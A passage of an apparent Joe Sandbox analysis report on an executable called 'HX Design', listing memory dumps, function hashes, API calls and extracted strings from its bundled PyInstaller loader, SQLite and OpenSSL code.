                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: database schema is locked: %s$out of memory$statement too long
                                                                                                                                                                                                                                                      • API String ID: 4225454184-1046679716
                                                                                                                                                                                                                                                      • Opcode ID: bcec233128a6adfefd10faecb298d26b31b29af4ba3b25e346ab80f8a0dd3f1a
                                                                                                                                                                                                                                                      • Instruction ID: d339442dcec7a0d2e3ecaf6683aabbce527f1bda9f04ca2594407e24354c3cb4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcec233128a6adfefd10faecb298d26b31b29af4ba3b25e346ab80f8a0dd3f1a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5F1A322F4A6878AEB25AF25D420FBA6BE2FB45748F054135DA6D077E9CF7CE5408300
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                                                                                                      • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                                      • Instruction ID: 0f2ad1ecd311a0099d341dd3c5df9fd245612e76300dbd6449f156101301a07f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE31B636608F8196DB60EF24E8402BEB3A4FB88754F900135EA9D43B65DF7CC149DB10
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
                                                                                                                                                                                                                                                      • API String ID: 0-1194634662
                                                                                                                                                                                                                                                      • Opcode ID: d7c51ff00aa3bb62bc4b7c529fdc1557d19d858cb9888e3d1740cde6f66a3c2f
                                                                                                                                                                                                                                                      • Instruction ID: 8ea95384600ee31b047f961e33b0576a27c558876a72b31e38492b3a75130b95
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7c51ff00aa3bb62bc4b7c529fdc1557d19d858cb9888e3d1740cde6f66a3c2f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DBD17C21B0D78281EB52DB66E8407ED6791EB85B84F184076EF4D4BBAECE7CE541C710
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2227656907-0
                                                                                                                                                                                                                                                      • Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                                      • Instruction ID: 87bed1b45409a0ddc2972ac7848513cb50c134a8efad4fbc837271cc7f11f1ae
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CB1E422B1869291EA60BB25D4001BBE3A1EF44FE4F845131EE5D57BC5EFBCE449E320
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007
                                                                                                                                                                                                                                                      • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
                                                                                                                                                                                                                                                      • API String ID: 3568877910-3130753023
                                                                                                                                                                                                                                                      • Opcode ID: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
                                                                                                                                                                                                                                                      • Instruction ID: e19fa2dad86a98ba56c750ec7cb47ac3e737e105fcfd6182d01f674729eaf560
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C12BE62B18B8381FB129B65D4442BEA7A1FF85B84F449032DF8D47BAEDE7CE5418740
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: $recovered %d frames from WAL file %s
                                                                                                                                                                                                                                                      • API String ID: 0-3175670447
                                                                                                                                                                                                                                                      • Opcode ID: 5b39556d8798284ef51883c6a8a336aae58982f94e60b940d7809ca3056fce41
                                                                                                                                                                                                                                                      • Instruction ID: a8896d9e81364f4bee7f8cfae609693021967478f4a86c92544f53e2bb3f1728
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b39556d8798284ef51883c6a8a336aae58982f94e60b940d7809ca3056fce41
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65F19D36B09686C6E764DF29E054B6E7BA4F784B88F014035DA6D97BA8DF38D844CB40
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007
                                                                                                                                                                                                                                                      • String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_psk
                                                                                                                                                                                                                                                      • API String ID: 3568877910-446233508
                                                                                                                                                                                                                                                      • Opcode ID: 7fb5678b9f67f08e663784aae6565b9e065ad5c58e2e1987a57ae2b77471c9e7
                                                                                                                                                                                                                                                      • Instruction ID: 60d36ad8a9d3559c55883d69b7fa273d01276dd8cf22f4c53d23ea6043b39e41
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7fb5678b9f67f08e663784aae6565b9e065ad5c58e2e1987a57ae2b77471c9e7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8AD18AA5B1C68381FA56AA2295503FE5391EF89BC4F148031EF0E47BAECF6DE6418741
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF732065840
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF732065852
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF732065889
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206589B
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320658B4
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320658C6
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320658DF
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320658F1
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206590D
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206591F
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206593B
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206594D
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF732065969
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206597B
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF732065997
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320659A9
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320659C5
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320659D7
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                      • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                      • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                                      • Instruction ID: 87b93f447fe19313d6a700db50923546ab4e02e049bb92a63ebf0194914f9d58
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE22A064A09B07B1FA58FB95A8545B6A2B0FF14B55FD41035C82E42AA0FFFCA54CF234
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                      • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                      • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                                      • Instruction ID: f5d0253a2f235e63eca7eff849e115442d0b3fb2dbded6db7d7acb36cff9dba5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B402C124A09B07B1FA54BB64B8509B6A3A1FF04B54FD41235D83E422A0EFBCB54DF634
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732069390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7320645F4,00000000,00007FF732061985), ref: 00007FF7320693C9
                                                                                                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7320686B7,?,?,00000000,00007FF732063CBB), ref: 00007FF73206822C
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732062810: MessageBoxW.USER32 ref: 00007FF7320628EA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                      • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                      • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                                      • Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                                                      • Instruction ID: 964905228b4dafa14bf1a6c678240bb15110a8afe0d74907b583647b33bf960f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B51A611B19643A1FA50BB25E8956BAE3A0EF84780FC44431D60E826D5FEFCE40CE324
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                      • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                      • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                      • Opcode ID: 2e06f33cb789c1c4285bc897e82d473ee5f193417d7b5bbbaceb79e5ee1fa664
                                                                                                                                                                                                                                                      • Instruction ID: fd6216224f01b94c8a35ccb1669811369356611b9856f716e9b985dda1a0cd91
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e06f33cb789c1c4285bc897e82d473ee5f193417d7b5bbbaceb79e5ee1fa664
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7251A021B08643B2EA10BB25D4001BAE3A0FF84B94FC44531EE9C47B96DEBCE55DE764
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
                                                                                                                                                                                                                                                      • API String ID: 0-3733955532
